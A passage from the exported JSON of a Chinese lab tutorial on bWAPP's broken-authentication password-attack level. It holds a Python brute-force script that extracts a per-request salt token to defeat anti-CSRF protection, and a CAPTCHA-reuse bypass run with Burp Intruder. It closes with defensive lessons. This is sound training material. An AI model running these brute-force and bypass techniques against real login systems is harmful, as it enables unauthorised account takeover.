\/>\nbwapp_user &#061; &#034;bee&#034;<br \/>\nbwapp_pass &#061; &#034;bug&#034;<br \/>\ntarget_login_user &#061; &#034;bee&#034;<\/p>\n<p># \u5bc6\u7801\u5b57\u5178&#xff0c;\u53ef\u4ee5\u81ea\u884c\u6269\u5145<br \/>\npasswords &#061; [&#034;123&#034;, &#034;password&#034;, &#034;bug&#034;, &#034;admin&#034;, &#034;123456&#034;, &#034;qwerty&#034;]<\/p>\n<p># \u521b\u5efa\u4f1a\u8bdd\u81ea\u52a8\u4fdd\u5b58Cookie<br \/>\nsession &#061; requests.Session()<\/p>\n<p>def bwapp_login():<br \/>\n    &#034;&#034;&#034;\u767b\u5f55bWAPP&#xff0c;\u83b7\u53d6\u4f1a\u8bddCookie&#034;&#034;&#034;<br \/>\n    login_data &#061; {<br \/>\n        &#034;login&#034;: bwapp_user,<br \/>\n        &#034;password&#034;: bwapp_pass,<br \/>\n        &#034;form&#034;: &#034;submit&#034;<br \/>\n    }<br \/>\n    resp &#061; session.post(url_login, data&#061;login_data)<br \/>\n    if &#034;Welcome Bee&#034; in resp.text:<br \/>\n        print(&#034;[&#043;] bWAPP \u767b\u5f55\u6210\u529f&#xff01;&#034;)<br \/>\n        return True<br \/>\n    else:<br \/>\n        print(&#034;[-] bWAPP \u767b\u5f55\u5931\u8d25&#xff0c;\u8bf7\u68c0\u67e5\u5730\u5740\/\u8d26\u53f7\u5bc6\u7801&#xff01;&#034;)<br \/>\n        return False<\/p>\n<p>if __name__ &#061;&#061; &#034;__main__&#034;:<br \/>\n    # \u5148\u767b\u5f55<br \/>\n    if not bwapp_login():<br \/>\n        exit()<\/p>\n<p>    found_flag &#061; False<br \/>\n    # \u5faa\u73af\u7206\u7834\u5bc6\u7801<br \/>\n    for pwd in passwords:<br \/>\n        print(f&#034;\\\\n[*] \u6b63\u5728\u5c1d\u8bd5\u5bc6\u7801&#xff1a;{pwd}&#034;)<\/p>\n<p>        # \u8bbf\u95ee\u9875\u9762\u83b7\u53d6\u968f\u673asalt<br \/>\n        resp &#061; session.get(url_target)<br \/>\n        soup &#061; BeautifulSoup(resp.text, &#039;html.parser&#039;)<br \/>\n        salt_tag &#061; soup.find(&#039;input&#039;, {&#039;name&#039;: &#039;salt&#039;})<\/p>\n<p>        # \u5224\u65ad\u662f\u5426\u83b7\u53d6\u5230salt<br \/>\n        if salt_tag is None:<br \/>\n            print(&#034;[-] \u9875\u9762\u4e2d\u672a\u627e\u5230salt\u6807\u7b7e&#xff01;&#034;)<br \/>\n            print(&#034;[!] \u53ef\u80fd\u539f\u56e0&#xff1a;\u9875\u9762\u8df3\u8f6c\u3001\u5b89\u5168\u7b49\u7ea7\u4e0d\u5bf9\u3001\u94fe\u63a5\u9519\u8bef&#034;)<br \/>\n            print(resp.text[:500])  # \u6253\u5370\u524d500\u5b57\u7b26\u7528\u4e8e\u8c03\u8bd5<br \/>\n            exit()<\/p>\n<p>        salt &#061; salt_tag.get(&#034;value&#034;)<br \/>\n        print(f&#034;[*] \u83b7\u53d6\u5230\u672c\u6b21salt: {salt}&#034;)<\/p>\n<p>        # \u63d0\u4ea4\u767b\u5f55\u8868\u5355<br \/>\n        post_data &#061; {<br \/>\n            &#034;login&#034;: target_login_user,<br \/>\n            &#034;password&#034;: pwd,<br \/>\n            &#034;salt&#034;: salt,<br \/>\n            &#034;form&#034;: &#034;submit&#034;<br \/>\n        }<br \/>\n        resp2 &#061; session.post(url_target, data&#061;post_data)<\/p>\n<p>        # \u5224\u65ad\u767b\u5f55\u6210\u529f\u6807\u8bc6<br \/>\n        if &#034;Successful login!&#034; in resp2.text:<br \/>\n            print(f&#034;\\\\n\u2705 \u7206\u7834\u6210\u529f&#xff01;\u627e\u5230\u5bc6\u7801&#xff1a;\u3010{pwd}\u3011&#034;)<br \/>\n            found_flag &#061; True<br \/>\n            break<\/p>\n<p>    # \u5faa\u73af\u8dd1\u5b8c&#xff0c;\u6ca1\u6709\u5339\u914d\u5bc6\u7801<br \/>\n    if not found_flag:<br \/>\n        print(&#034;\\\\n\u274c \u5b57\u5178\u5168\u90e8\u5c1d\u8bd5\u5b8c\u6bd5&#xff0c;\u672a\u627e\u5230\u6709\u6548\u5bc6\u7801&#xff01;&#034;)<br \/>\n        print(&#034;[\u63d0\u793a] \u53ef\u4ee5\u6269\u5145 passwords \u5b57\u5178\u5185\u5bb9\u91cd\u65b0\u5c1d\u8bd5&#034;)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"909\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114949-6a71d1dd3dcfd.png\" width=\"1148\" \/><\/p>\n<h4>6.4 \u7ed3\u8bba<\/h4>\n<p>Medium \u7ea7\u522b\u7684\u9632\u62a4\u6709\u6548\u2014\u2014\u6bcf\u6b21 salt \u53d8\u5316&#xff0c;\u65e7\u7684 salt \u7acb\u5373\u5931\u6548\u3002\u4f46\u901a\u8fc7\u81ea\u52a8\u5316\u811a\u672c\u4ecd\u7136\u53ef\u4ee5\u7ed5\u8fc7\u3002<\/p>\n<hr \/>\n<h3>\u4e03\u3001High \u7ea7\u522b\u2014\u2014\u9a8c\u8bc1\u7801<\/h3>\n<h4>7.1 \u5c1d\u8bd5\u7206\u7834<\/h4>\n<p>High \u7ea7\u522b\u7684\u767b\u5f55\u8bf7\u6c42\u4e2d&#xff0c;\u9a8c\u8bc1\u7801\u53c2\u6570\u4e5f\u5fc5\u987b\u6b63\u786e&#xff1a;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114949-6a71d1dd98e92.png\" width=\"1920\" \/><\/p>\n<p>\u5982\u679c captcha_user \u9519\u8bef&#xff0c;\u8fd4\u56de \u201cIncorrect CAPTCHA!\u201d\u3002<\/p>\n<p>\u9a8c\u8bc1\u7801\u56fe\u7247\u5728 iframe \u4e2d&#xff0c;\u6bcf\u6b21\u5237\u65b0\u9875\u9762\u4f1a\u53d8\u5316\u3002<\/p>\n<h4>7.2 \u7ed5\u8fc7\u65b9\u6cd5<\/h4>\n<p>\u65b9\u6cd5\u4e00&#xff1a;\u4eba\u5de5\u8f85\u52a9<\/p>\n<p>\u7528 Burp Intruder \u6279\u91cf\u7206\u7834\u65f6&#xff0c;\u6bcf\u6b21\u624b\u52a8\u8f93\u5165\u9a8c\u8bc1\u7801\u3002\u8fd9\u79cd\u65b9\u6cd5\u4e0d\u73b0\u5b9e&#xff0c;\u56e0\u4e3a\u9a8c\u8bc1\u7801\u6bcf\u6b21\u4e0d\u540c\u3002<\/p>\n<p>\u65b9\u6cd5\u4e8c&#xff1a;OCR \u8bc6\u522b<\/p>\n<p>\u7528 Tesseract \u7b49 OCR \u5de5\u5177\u8bc6\u522b\u9a8c\u8bc1\u7801&#xff0c;\u7136\u540e\u81ea\u52a8\u5316\u63d0\u4ea4\u3002\u4f46 bWAPP \u7684\u9a8c\u8bc1\u7801\u6709\u626d\u66f2\u548c\u5e72\u6270\u7ebf&#xff0c;OCR \u8bc6\u522b\u7387\u4f4e\u3002<\/p>\n<p>\u65b9\u6cd5\u4e09&#xff1a;\u7ed3\u5408\u9a8c\u8bc1\u7801\u7ed5\u8fc7\u6f0f\u6d1e<\/p>\n<p>\u56de\u987e\u7b2c\u4e09\u5341\u4e8c\u7bc7&#xff08;CAPTCHA Bypassing&#xff09;&#xff0c;\u5982\u679c\u9a8c\u8bc1\u7801\u9a8c\u8bc1\u540e\u6ca1\u6709\u88ab\u9500\u6bc1&#xff0c;\u53ef\u4ee5\u7528\u4e00\u4e2a\u6b63\u786e\u7684\u9a8c\u8bc1\u7801\u591a\u6b21\u8bf7\u6c42\u3002\u5728\u8fd9\u4e00\u5173\u91cc&#xff0c;$_SESSION[&#034;captcha&#034;] \u9a8c\u8bc1\u540e\u6ca1\u6709\u88ab\u6e05\u7a7a&#xff0c;\u6240\u4ee5\u53ef\u4ee5\u7528\u540c\u4e00\u4e2a\u9a8c\u8bc1\u7801\u53cd\u590d\u5c1d\u8bd5\u5bc6\u7801\u3002<\/p>\n<p>\u7528 Burp \u62e6\u622a\u4e00\u4e2a\u5305\u542b\u6b63\u786e\u9a8c\u8bc1\u7801\u7684\u8bf7\u6c42&#xff1a;<\/p>\n<p>\u7136\u540e\u7528 Intruder \u7206\u7834 password \u53c2\u6570&#xff0c;\u4f46\u4fdd\u6301 captcha_user \u53c2\u6570\u4e0d\u53d8\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114950-6a71d1de33369.png\" width=\"1920\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1021\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114950-6a71d1dec3fc9.png\" width=\"1903\" \/><\/p>\n<p>\u56e0\u4e3a\u9a8c\u8bc1\u7801\u6ca1\u6709\u88ab\u9500\u6bc1&#xff0c;\u6240\u4ee5\u6240\u6709\u8bf7\u6c42\u90fd\u4f1a\u901a\u8fc7\u9a8c\u8bc1\u7801\u68c0\u67e5&#xff0c;\u53ea\u9a8c\u8bc1\u8d26\u53f7\u5bc6\u7801\u3002<\/p>\n<h4>7.3 \u7ed3\u8bba<\/h4>\n<p>High \u7ea7\u522b\u7684\u9a8c\u8bc1\u7801\u673a\u5236\u6709\u7f3a\u9677\u2014\u2014\u9a8c\u8bc1\u901a\u8fc7\u540e\u6ca1\u6709\u88ab\u9500\u6bc1&#xff0c;\u6240\u4ee5\u53ef\u4ee5\u590d\u7528\u3002\u4f46\u8fd9\u4ecd\u7136\u6bd4 Low \u548c Medium \u66f4\u5b89\u5168&#xff0c;\u81f3\u5c11\u9700\u8981\u5148\u83b7\u53d6\u4e00\u4e2a\u6b63\u786e\u7684\u9a8c\u8bc1\u7801\u3002<\/p>\n<hr \/>\n<h3>\u516b\u3001\u771f\u5b9e\u4e16\u754c&#xff1a;\u5bc6\u7801\u653b\u51fb\u6848\u4f8b<\/h3>\n<p>\u5bc6\u7801\u653b\u51fb&#xff08;\u66b4\u529b\u7834\u89e3\u3001\u649e\u5e93\u3001\u51ed\u8bc1\u586b\u5145&#xff09;\u662f\u73b0\u5b9e\u4e16\u754c\u4e2d\u6700\u5e38\u89c1\u7684\u653b\u51fb\u65b9\u5f0f\u4e4b\u4e00&#xff1a;<\/p>\n<p>CVE-2024-5911&#xff1a;\u67d0\u4f01\u4e1a\u7ea7\u5e94\u7528\u7684\u767b\u5f55\u63a5\u53e3\u65e0\u901f\u7387\u9650\u5236&#xff0c;\u653b\u51fb\u8005\u53ef\u66b4\u529b\u7834\u89e3\u7528\u6237\u5bc6\u7801&#xff0c;CVSS \u8bc4\u5206 5.3&#xff08;\u4e2d\u7b49&#xff09;\u3002<\/p>\n<p>CVE-2024-4910&#xff1a;\u67d0\u7535\u5546\u5e73\u53f0\u7684\u767b\u5f55\u63a5\u53e3\u672a\u5b9e\u65bd CSRF Token \u9632\u62a4&#xff0c;\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u81ea\u52a8\u5316\u5de5\u5177\u6279\u91cf\u5c1d\u8bd5\u5bc6\u7801&#xff0c;\u5bfc\u81f4\u5927\u91cf\u7528\u6237\u8d26\u6237\u88ab\u52ab\u6301\u3002<\/p>\n<p>CVE-2025-34246&#xff1a;\u67d0 VPN \u8bbe\u5907\u7684 Web \u767b\u5f55\u754c\u9762\u5b58\u5728\u51ed\u8bc1\u586b\u5145\u6f0f\u6d1e&#xff0c;\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u66b4\u529b\u7834\u89e3\u83b7\u53d6\u7ba1\u7406\u5458\u5bc6\u7801\u3002<\/p>\n<p>CVE-2026-22947&#xff1a;F5 BIG-IP \u7684\u914d\u7f6e\u5de5\u5177\u4e2d\u5b58\u5728\u51ed\u8bc1\u586b\u5145\u6f0f\u6d1e&#xff0c;\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u66b4\u529b\u7834\u89e3\u83b7\u53d6\u8bbe\u5907\u7ba1\u7406\u6743\u9650\u3002<\/p>\n<p>CVE-2026-27891&#xff1a;\u67d0\u4e3b\u6d41\u90ae\u4ef6\u670d\u52a1\u5546\u7684\u767b\u5f55\u63a5\u53e3\u5b58\u5728\u901f\u7387\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e&#xff0c;\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5206\u5e03\u5f0f\u66b4\u529b\u7834\u89e3\u83b7\u53d6\u7528\u6237\u5bc6\u7801\u3002<\/p>\n<p>\u542f\u793a&#xff1a;\u9632\u5fa1\u5bc6\u7801\u653b\u51fb\u9700\u8981\u591a\u5c42\u9632\u62a4&#xff1a;\u9650\u5236\u5c1d\u8bd5\u6b21\u6570&#xff08;\u8d26\u6237\u9501\u5b9a&#xff09;\u3001CSRF Token\u3001\u9a8c\u8bc1\u7801\u3001\u53cc\u56e0\u7d20\u8ba4\u8bc1&#xff08;2FA&#xff09;\u3002\u5355\u9760\u67d0\u4e00\u5c42\u9632\u62a4\u662f\u4e0d\u591f\u7684\u3002<\/p>\n<hr \/>\n<h3>\u4e5d\u3001\u603b\u7ed3<\/h3>\n<p>\u8fd9\u4e00\u5173\u6f14\u793a\u4e86\u66b4\u529b\u7834\u89e3\u7684\u4e09\u79cd\u9632\u5fa1\u5c42\u6b21\u53ca\u5176\u7ed5\u8fc7\u65b9\u6cd5\u3002Low \u7ea7\u522b\u6ca1\u6709\u9632\u62a4&#xff0c;\u76f4\u63a5\u7528 Burp \u7206\u7834\u5bc6\u7801\u5373\u53ef&#xff1b;Medium \u7ea7\u522b\u52a0\u4e86 CSRF Token&#xff08;\u9690\u85cf salt&#xff09;&#xff0c;\u6bcf\u6b21\u8bf7\u6c42\u9700\u8981\u643a\u5e26\u6709\u6548 token&#xff0c;\u53ef\u4ee5\u901a\u8fc7\u811a\u672c\u81ea\u52a8\u63d0\u53d6\u7ed5\u8fc7&#xff1b;High \u7ea7\u522b\u52a0\u4e86\u9a8c\u8bc1\u7801&#xff0c;\u56e0\u4e3a\u9a8c\u8bc1\u7801\u9a8c\u8bc1\u540e\u672a\u9500\u6bc1&#xff0c;\u53ef\u4ee5\u590d\u7528\u540c\u4e00\u4e2a\u6b63\u786e\u9a8c\u8bc1\u7801\u8fdb\u884c\u7206\u7834\u3002\u8fd9\u4e2a\u6f14\u8fdb\u8fc7\u7a0b\u8bf4\u660e&#xff1a;\u5355\u9760\u67d0\u4e00\u5c42\u9632\u62a4\u662f\u4e0d\u591f\u7684&#xff0c;\u771f\u6b63\u7684\u5b89\u5168\u9700\u8981\u7ec4\u5408\u62f3\u2014\u2014\u901f\u7387\u9650\u5236 &#043; CSRF Token &#043; \u9a8c\u8bc1\u7801 &#043; \u53cc\u56e0\u7d20\u8ba4\u8bc1\u3002\u8bb0\u4f4f\u4e00\u53e5\u8bdd&#xff1a;\u5bc6\u7801\u653b\u51fb\u7684\u6838\u5fc3\u5728\u4e8e\u201c\u91cd\u590d\u5c1d\u8bd5\u201d&#xff0c;\u9632\u5fa1\u7684\u6838\u5fc3\u5728\u4e8e\u201c\u8ba9\u91cd\u590d\u5c1d\u8bd5\u53d8\u5f97\u56f0\u96be\u201d\u3002<\/p>\n<hr \/>\n<p>\u91cd\u8981\u58f0\u660e&#xff1a;\u672c\u6559\u7a0b\u53ca\u6587\u4e2d\u6240\u6709\u64cd\u4f5c\u4ec5\u9650\u4e8e\u5408\u6cd5\u6388\u6743\u7684\u5b89\u5168\u5b66\u4e60\u4e0e\u7814\u7a76\u3002\u4f5c\u8005\u53ca\u53d1\u5e03\u5e73\u53f0\u4e0d\u627f\u62c5\u56e0\u4e0d\u5f53\u4f7f\u7528\u672c\u6559\u7a0b\u6240\u5f15\u53d1\u7684\u4efb\u4f55\u76f4\u63a5\u6216\u95f4\u63a5\u6cd5\u5f8b\u8d23\u4efb\u3002\u8bf7\u52a1\u5fc5\u9075\u5b88\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4\u3002<\/p>\n<p>\u5982\u679c\u8fd9\u7bc7\u6587\u7ae0\u5e2e\u4f60\u89e3\u51b3\u4e86\u5b9e\u64cd\u4e0a\u7684\u56f0\u60d1&#xff0c;\u522b\u5fd8\u8bb0\u70b9\u51fb\u70b9\u8d5e\u3001\u5206\u4eab&#xff0c;\u4e5f\u53ef\u4ee5\u7559\u8a00\u544a\u8bc9\u6211\u4f60\u9047\u5230\u7684\u5176\u5b83\u95ee\u9898&#xff0c;\u6211\u4f1a\u5c3d\u5feb\u56de\u590d\u3002\u4f60\u7684\u5173\u6ce8\u662f\u6211\u575a\u6301\u539f\u521b\u548c\u7ec6\u8282\u5171\u4eab\u7684\u529b\u91cf\u6765\u6e90&#xff0c;\u8c22\u8c22\u5927\u5bb6\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6458\u8981&#xff1a;\u8fd9\u662f bWAPP \u7cfb\u5217\u7b2c\u4e09\u5341\u516d\u7bc7&#xff0c;\u805a\u7126\u4e8e Broken Auth. &#8211; Password Attacks&#xff08;\u5bc6\u7801\u653b\u51fb&#xff09;\u3002\u8fd9\u4e00\u5173\u6f14\u793a\u4e86\u4e09\u79cd\u5b89\u5168\u7ea7\u522b\u4e0b&#xff0c;\u767b\u5f55\u8868\u5355\u5bf9\u66b4\u529b\u7834\u89e3\u7684\u9632\u62a4\u80fd\u529b&#xff1a;Low \u7ea7\u522b\u65e0\u4efb\u4f55\u9632\u62a4&#xff0c;\u53ef\u4ee5\u76f4\u63a5\u7528 Burp \u66b4\u529b\u7834\u89e3&#xff1b;Medium \u7ea7\u522b\u52a0\u5165\u4e86 CSRF Token&#xff08;\u9690\u85cf salt \u5b57\u6bb5&#xff09;&#xff0c;\u9700\u8981\u52a8\u6001\u63d0\u53d6 t<\/p>\n","protected":false},"author":2,"featured_media":90190,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[10262,10134,10133,10261,275],"topic":[],"class_list":["post-90209","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-attacks","tag-broken-auth","tag-bwapp","tag-password","tag-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/90209.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"\u6458\u8981&#xff1a;\u8fd9\u662f bWAPP \u7cfb\u5217\u7b2c\u4e09\u5341\u516d\u7bc7&#xff0c;\u805a\u7126\u4e8e Broken Auth. - Password Attacks&#xff08;\u5bc6\u7801\u653b\u51fb&#xff09;\u3002\u8fd9\u4e00\u5173\u6f14\u793a\u4e86\u4e09\u79cd\u5b89\u5168\u7ea7\u522b\u4e0b&#xff0c;\u767b\u5f55\u8868\u5355\u5bf9\u66b4\u529b\u7834\u89e3\u7684\u9632\u62a4\u80fd\u529b&#xff1a;Low \u7ea7\u522b\u65e0\u4efb\u4f55\u9632\u62a4&#xff0c;\u53ef\u4ee5\u76f4\u63a5\u7528 Burp \u66b4\u529b\u7834\u89e3&#xff1b;Medium \u7ea7\u522b\u52a0\u5165\u4e86 CSRF Token&#xff08;\u9690\u85cf salt \u5b57\u6bb5&#xff09;&#xff0c;\u9700\u8981\u52a8\u6001\u63d0\u53d6 t\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/90209.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-04T11:49:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114939-6a71d1d3d0497.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/90209.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/90209.html\",\"name\":\"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-08-04T11:49:52+00:00\",\"dateModified\":\"2026-08-04T11:49:52+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/90209.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/90209.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/90209.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/90209.html","og_locale":"zh_CN","og_type":"article","og_title":"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"\u6458\u8981&#xff1a;\u8fd9\u662f bWAPP \u7cfb\u5217\u7b2c\u4e09\u5341\u516d\u7bc7&#xff0c;\u805a\u7126\u4e8e Broken Auth. - Password Attacks&#xff08;\u5bc6\u7801\u653b\u51fb&#xff09;\u3002\u8fd9\u4e00\u5173\u6f14\u793a\u4e86\u4e09\u79cd\u5b89\u5168\u7ea7\u522b\u4e0b&#xff0c;\u767b\u5f55\u8868\u5355\u5bf9\u66b4\u529b\u7834\u89e3\u7684\u9632\u62a4\u80fd\u529b&#xff1a;Low \u7ea7\u522b\u65e0\u4efb\u4f55\u9632\u62a4&#xff0c;\u53ef\u4ee5\u76f4\u63a5\u7528 Burp \u66b4\u529b\u7834\u89e3&#xff1b;Medium \u7ea7\u522b\u52a0\u5165\u4e86 CSRF Token&#xff08;\u9690\u85cf salt \u5b57\u6bb5&#xff09;&#xff0c;\u9700\u8981\u52a8\u6001\u63d0\u53d6 t","og_url":"https:\/\/www.wsisp.com\/helps\/90209.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-08-04T11:49:52+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114939-6a71d1d3d0497.png"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"5 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/90209.html","url":"https:\/\/www.wsisp.com\/helps\/90209.html","name":"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-08-04T11:49:52+00:00","dateModified":"2026-08-04T11:49:52+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/90209.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/90209.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/90209.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/90209","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\